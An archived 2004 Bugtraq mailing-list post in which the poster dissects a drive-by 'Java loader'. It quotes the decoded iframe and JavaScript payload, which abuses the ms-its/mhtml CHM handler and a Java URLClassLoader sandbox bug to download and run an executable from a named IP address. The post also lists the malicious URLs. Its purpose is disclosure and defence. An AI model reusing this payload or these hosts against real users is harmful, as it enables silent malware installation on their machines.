Home page logo
/

bugtraq logo Bugtraq mailing list archives

Strange Java Loader
From: duffbeer <duffbeer () gmx net>
Date: Thu, 30 Dec 2004 07:34:23 +0100

Hi People,

before reading this,
dont go on any of the sites
unless you are sure ;)

after decrypting some stuff, this is the source from:
http://xxl-size.com/cogo.html
-------------------------------------
<iframe src="http://209.8.20.130/dl/adv346.php";>
<iframe src="http://www.awmcash.biz/adverts/14/1.htm";>
-------------------------------------

this is the source from one of the iframes
(http://209.8.20.130/dl/adv346.php):
----------------------------------------------------
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
    <object data="${PR}" type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'&#109;s-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm&apos;));
</script>
<applet width=1 height=1 ARCHIVE=loaderadv346.jar code=Counter></APPLET></body></html>
----------------------------------------------------

the jar archive loaderadv346.jar contains some java classes
which exploits the URLClassLoader bug (BlackBox.class).
it overrides the sandbox and downloads a loadadv346.exe from:
http://209.8.20.130/dl/loadadv346.exe

this seems to be a dialer or something like this,
it changes the hosts file, creates some spawn files,
you can look for yourself, i included the file
and the java stuff, the loadadv is upx'd,

so far, anyone knows how to protect from this crap?
you're welcome to send some solutions ;)

cya, Stefan

Attachment: loaderadv.zip
Description:


  By Date           By Thread  

Current thread:
  • Strange Java Loader duffbeer (Dec 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]